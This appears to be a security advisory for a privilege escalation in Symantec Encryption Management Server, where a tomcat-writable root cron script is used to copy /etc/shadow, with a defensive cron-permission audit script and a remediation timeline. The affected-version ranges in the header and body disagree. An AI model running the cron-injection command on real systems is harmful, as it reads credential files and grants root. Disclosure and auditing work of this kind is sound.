Note: Local privilege escalation vulnerability in SEMS <= 3.3.2 MP12 allowing escalation of privileges to the root superuser.

Summary

The tomcat user on an affected Symantec Encryption Management Server (SEMS) is susceptible to a privilege escalation vulnerability that results in root privileges.

Affected Versions

  • Symantec Encryption Management Server <= 3.3.2 MP11

CVSSv3 Score

7.8 (High) CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Technical Details

A reverse shell as tomcat is useful. Root is better. Getting there turned out to be straightforward.

The tomcat user had write access to /etc/cron.daily/tomcat.cron — a daily cron job executed in the context of the root superuser:

$ ls -al /etc/cron.daily/tomcat.cron
-rwxrwxr-x 1 root tomcat 88 Jul  6 03:58 /etc/cron.daily/tomcat.cron

Writable by tomcat, executed by root. That’s all you need. Appending a command to the cron job:

$ echo 'cat /etc/shadow > /tmp/shadow' >> /etc/cron.daily/tomcat.cron

After the next scheduled execution:

$ ls -l /tmp/shadow
-rw-r--r-- 1 root root 825 Jul  6 04:02 /tmp/shadow

$ cat /tmp/shadow
root:!!:16612:0:99999:7:::
bin:*:16612:0:99999:7:::
daemon:*:16612:0:99999:7:::
...

Full root access. From a Reporter account. Via the search box.

Chaining CVE-2015-8151 into CVE-2015-8150 takes you from low-privileged web UI access to root on the underlying appliance. That’s the kind of finding that makes for a very interesting debrief conversation.
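An audit for the permission pattern shown above (a root-executed cron script carrying a group-write bit for a service account's group), as an added example that is not part of the original advisory or of Symantec's fix. The function name `audit_cron_dir` and its parameters are assumptions made for illustration.

```shell
#!/bin/sh
# Added example (not from the advisory): flag cron scripts that an account
# other than root could modify. Function name and arguments are hypothetical.
#
# audit_cron_dir DIR [TRUSTED_UID] [TRUSTED_GID]
#   Prints one "reason<TAB>path" line per finding.
#   Returns 0 when clean, 1 when findings exist, 2 on a bad argument.
audit_cron_dir() {
    dir=$1
    uid=${2:-0}   # owner expected on every script (root by default)
    gid=${3:-0}   # the only group allowed to hold the group-write bit
    [ -d "$dir" ] || { echo "not a directory: $dir" >&2; return 2; }

    findings=$(
        # An owner other than the trusted account can rewrite the file at will.
        find "$dir" -type f ! -user "$uid" \
            -exec printf 'untrusted-owner\t%s\n' {} \;
        # Group-write bit set while the group is not the trusted one:
        # the root:tomcat rwxrwxr-x case listed above.
        find "$dir" -type f -perm -020 ! -group "$gid" \
            -exec printf 'group-writable\t%s\n' {} \;
        # World-writable: any local account can append to the script.
        find "$dir" -type f -perm -002 \
            -exec printf 'world-writable\t%s\n' {} \;
    )
    [ -z "$findings" ] && return 0
    printf '%s\n' "$findings"
    return 1
}

# Typical use on a host, run as root:
#   for d in /etc/cron.hourly /etc/cron.daily /etc/cron.weekly /etc/cron.monthly
#   do audit_cron_dir "$d"; done
```

A finding of `group-writable` on a file in `/etc/cron.daily` corresponds to the `-rwxrwxr-x 1 root tomcat` listing above; removing the group-write bit (`chmod g-w`) closes that path.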

Timeline

Date        Event
2015-07-06  Vulnerability discovered
2015-07-30  Vendor contacted
2015-08-02  Vendor confirms issue
2016-02-19  Patch released (v3.3.2 MP12)
2016-06-07  Public disclosure

Remediation

Symantec product engineers have addressed these issues in Symantec Encryption Management Server 3.3.2 MP12. Customers should update to SEMS 3.3.2 MP12 as soon as possible to address these issues.

Credit

Discovered and reported by Toby Reynolds following responsible disclosure guidelines.